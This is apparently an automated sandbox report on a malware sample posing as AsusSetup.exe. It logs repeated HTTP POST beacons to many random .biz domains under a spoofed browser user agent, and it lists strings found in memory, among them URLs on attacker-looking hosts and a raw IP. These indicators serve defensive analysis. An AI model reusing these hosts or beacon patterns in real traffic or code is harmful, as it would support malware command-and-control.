Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /og HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qmncq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /iboogqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pcwhdleqsuu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /xcibcauw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /assjekuls HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /isekcf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /gneewdogqwseu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /onpfurgnxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /roauatfpewvsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /aixrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /moaxleedvt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /sspabsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qrtkifykhcnq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /sduodvbdxsrqja HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /guistk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /taltetnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yasnhmosjfaqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oogcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cftycvbqsjsfc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /klbxxtxcjep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /srbpajvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dnmujj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /jw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cssyiwvwfakxyln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /asvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dnnoxqpiwspjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /srcxcicm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ydbxvrfdujat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /otrjjjdmycgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /klxaypeiwoubq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mcduyucxmuwka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /hrucffqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lmpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /euqwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tlbvmelxpwjipdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pffvqbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vebfxvjlhsxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /luseoc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ngujcsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /iljbyhyeqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ysihuw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cbrxaago HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /herwmjqyyara HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vtxunog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ataqclhdwkpjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ruuxvcxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /exbxilbdfwja HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /htae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown
UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic
DNS traffic detected: DNS query: pywolwnvd.biz
Source: unknown
HTTP traffic detected: POST /ea HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 800
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:50:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 28 Oct 2024 15:51:26 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:51:48 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: alg.exe, 00000003.00000003.2610742112.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590844447.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2628578361.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/bdrtsxymflftlqp
Source: alg.exe, 00000003.00000003.2505034831.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/tkrvouqomflftlqp
Source: alg.exe, 00000003.00000003.2590844447.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2505034831.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/uuoiubsg
Source: AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
Source: alg.exe, 00000003.00000003.2307234515.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: alg.exe, 00000003.00000003.2757343877.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: setup.exe1.3.drString found in binary or memory: https://clients2.google.com/cr/report
Source: alg.exe, 00000003.00000003.2343619064.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000003.00000003.2344356497.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2344146987.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: alg.exe, 00000003.00000003.2757401018.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/
Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/bug/new
Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: alg.exe, 00000003.00000003.2739269535.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
Source: alg.exe, 00000003.00000003.2739269535.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
Source: alg.exe, 00000003.00000003.2757457724.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000003.00000003.2757457724.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000003.00000003.2739562117.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
